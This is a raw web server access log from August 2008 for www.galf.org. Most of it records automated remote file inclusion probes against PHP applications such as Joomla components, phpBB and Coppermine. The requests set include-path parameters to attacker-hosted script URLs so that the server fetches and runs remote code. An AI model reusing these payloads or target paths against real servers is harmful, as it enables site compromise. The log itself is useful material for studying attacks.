219.117.239.114 - - [10/Aug/2008:18:07:59 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:08:49 -0700] "GET /logs/access_070806.log/index.php?pagina=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:08:49 -0700] "GET /logs/access_070827.log/index.php?pagina=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:09:01 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:09:01 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:09:31 -0700] "GET /logs/access_070924.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:18:09:37 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:18:09:37 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:09:52 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:09:52 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:09:55 -0700] "GET /logs/access_080121.log/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:09:55 -0700] "GET /logs/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:09:55 -0700] "GET /index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:18:11:35 -0700] "GET /logs/access_080107.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:18:11:45 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:18:11:45 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:11:58 -0700] "GET //modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:11:58 -0700] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:13:18 -0700] "GET /logs/access_080428.log/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:13:18 -0700] "GET /logs/access_080428.log/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:13:30 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:13:30 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:14:05 -0700] "GET /logs/access_070924.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:15:01 -0700] "GET /logs/access_080602.log/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:15:02 -0700] "GET /logs/access_080602.log/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:15:20 -0700] "GET /logs/access_071015.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:15:20 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:15:20 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9661 "-" "libwww-perl/5.79" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:16:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:16:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:16:14 -0700] "GET /logs/access_070924.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:16:44 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:17:22 -0700] "GET /logs/access_080407.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:17:23 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9661 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:17:36 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9661 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:18:03 -0700] "GET /logs/access_071015.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:18:13 -0700] "GET /logs/access_071015.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:18:17 -0700] "GET /logs/access_071015.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET /logs/access_080114.log//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET /logs/access_080114.log//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET /logs//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.142.67.13 - - [10/Aug/2008:18:18:42 -0700] "GET /logs//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:19:01 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:19:01 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:22:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:22:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:22:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:22:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.6.18.253 - - [10/Aug/2008:18:23:22 -0700] "GET /logs/access_080113.log HTTP/1.0" 200 262144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:18:24:12 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:24:35 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:24:44 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:24:47 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:18:28:08 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:28:15 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:28:15 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:28:21 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:28:21 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:29:08 -0700] "GET /logs/access_070827.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:29:13 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:29:15 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:29:16 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:29:17 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:29:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:29:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:29:53 -0700] "GET /logs/access_070827.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:30:01 -0700] "GET /logs/access_070827.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.224.97.84 - - [10/Aug/2008:18:30:08 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.tr/search?hl=tr&q=galf&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:30:46 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
88.224.97.84 - - [10/Aug/2008:18:31:29 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.tr/search?hl=tr&q=galf&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:34:04 -0700] "GET /logs/access_070827.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:34:25 -0700] "GET /logs/access_070827.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:34:27 -0700] "GET /logs/access_080407.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:34:27 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:34:43 -0700] "GET /logs/access_071029.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:34:47 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:34:52 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:35:00 -0700] "GET /logs/access_071015.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:35:07 -0700] "GET /logs/access_080714.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:35:15 -0700] "GET /logs/access_071231.log/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:35:15 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:35:15 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:35:24 -0700] "GET /logs/access_080114.log/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:18:35:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.70.83.4 - - [10/Aug/2008:18:35:32 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:36:19 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:37:49 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:37:49 -0700] "GET /logs/access_080114.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.21.71.133 - - [10/Aug/2008:18:37:49 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:38:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /logs/access_070917.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:39:32 -0700] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:39:32 -0700] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:40:11 -0700] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
70.85.102.132 - - [10/Aug/2008:18:40:11 -0700] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:40:20 -0700] "GET /logs/access_070917.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:40:20 -0700] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:40:21 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
81.177.3.99 - - [10/Aug/2008:18:40:40 -0700] "GET /logs/access_071014.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:40:51 -0700] "GET /logs/access_080602.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:40:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:40:52 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:40:58 -0700] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:42:55 -0700] "GET /logs/access_080204.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:18:43:11 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:45:10 -0700] "GET /logs/access_080602.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:45:10 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:45:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:45:57 -0700] "GET /logs/access_071001.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
